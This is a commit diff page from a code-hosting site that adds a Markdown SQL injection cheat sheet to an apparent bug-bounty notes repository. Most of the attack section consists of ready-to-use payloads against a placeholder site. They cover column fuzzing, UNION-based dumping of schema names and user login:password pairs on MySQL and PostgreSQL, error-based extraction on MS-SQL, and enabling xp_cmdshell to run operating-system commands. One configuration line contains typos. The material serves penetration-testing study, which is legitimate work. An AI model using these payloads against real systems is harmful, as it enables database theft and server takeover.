crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Commits 1ecbea42
🤬
  • ■ ■ ■ ■ ■ ■
    SQL Injection.md
    1  -# Soon!
     1 +# SQL injection
     2 + 
     3 +## Introduction
     4 +It is an attack in which an attacker inserts untrusted data in the application that results in revealing sensitive information of the database.
     5 + 
     6 +SQL Injection (SQLi) is a code injection attack where an attacker manipulates the data being sent to the server to execute malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting unauthorized data. This attack is mainly used to take over database servers.
     7 + 
     8 +- In-band SQLi (Classic SQLi)
     9 +- Error-based SQLi
     10 +- Union-based SQLi
     11 +- Inferential SQLi (Blind SQLi)
     12 +- Boolean-based (content-based) Blind SQLi
     13 +- Time-based Blind SQLi
     14 +- Out-of-band SQLi
     15 + 
     16 +## How to exploit
     17 +# SQLI tricks
     18 + 
     19 +## GET
     20 + 
     21 +### Error-Based
     22 + 
     23 +### Simple test
     24 + 
     25 +`Adding a simpe quote '`
     26 + 
     27 +Example: `http://vulnerable-website.com/Less-1/?id=5'`
     28 + 
     29 +### Fuzzing
     30 + 
     31 +Sorting columns to find maximum column
     32 + 
     33 +`http://vulnerable-website.com/Less-1/?id=-1 order by 1`
     34 + 
     35 +`http://vulnerable-website.com/Less-1/?id=-1 order by 2`
     36 + 
     37 +`http://vulnerable-website.com/Less-1/?id=-1 order by 3`
     38 + 
     39 +(until it stop returning errors)
     40 + 
     41 +---
     42 + 
     43 + 
     44 +### Finding what column is injectable
     45 + 
     46 +**mysql**
     47 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, 3` (using the same amount of columns you got on the previous step)
     48 + 
     49 +**postgresql**
     50 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, NULL` (using the same amount of columns you got on the previous step)
     51 + 
     52 + one of the columns will be printed with the respective number
     53 + 
     54 +---
     55 + 
     56 + 
     57 +#### Finding version
     58 + 
     59 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, version()` **mysql**
     60 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, version()` **postgres**s
     61 + 
     62 + 
     63 +#### Finding database name
     64 + 
     65 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1,2, database()` **mysql**
     66 + 
     67 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL,NULL, database()` **postgres**
     68 + 
     69 + 
     70 +#### Finding usernames logged in
     71 + 
     72 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, current_user()` **mysql**
     73 + 
     74 + 
     75 +#### Finding databases
     76 + 
     77 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` **mysql**
     78 + 
     79 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, datname from pg_database` **postgres**
     80 + 
     81 + 
     82 +#### Finding table names from a database
     83 + 
     84 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"` **mysql**
     85 + 
     86 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"` **postgres**
     87 + 
     88 + 
     89 +#### Finding column names from a table
     90 + 
     91 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"` **mysql**
     92 + 
     93 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"` **postgres**
     94 + 
     95 +#### Concatenate
     96 + 
     97 +Example:
     98 + 
     99 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login from users;`
     100 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, password from users;`
     101 + 
     102 +in one query
     103 + 
     104 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**
     105 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**
     106 + 
     107 + 
     108 +### Error Based SQLI (USUALLY MS-SQL)
     109 + 
     110 +#### Current user
     111 + 
     112 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`
     113 + 
     114 + 
     115 +#### DBMS version
     116 + 
     117 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`
     118 + 
     119 + 
     120 +#### Database name
     121 + 
     122 +`http://vulnerable-website.com/Less-1/?id=-1 or db_name(0)=0 --`
     123 + 
     124 + 
     125 +#### Tables from a database
     126 + 
     127 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`
     128 + 
     129 +---
     130 + 
     131 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`
     132 + 
     133 + 
     134 +#### Columns within a table
     135 + 
     136 + 
     137 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`
     138 + 
     139 +> remember to change **dbname** and **tablename** accordingly with the given situation
     140 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     141 + 
     142 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`
     143 + 
     144 + 
     145 +#### Actual data
     146 + 
     147 + 
     148 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`
     149 + 
     150 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     151 + 
     152 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--`
     153 + 
     154 + 
     155 +#### Shell commands
     156 + 
     157 +`EXEC master..xp_cmdshell <command>`
     158 + 
     159 +> you need yo be 'sa' user
     160 + 
     161 +#### Enabling shell commands
     162 + 
     163 +`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;`
     164 + 
Please wait...
Page is in error, reload to recover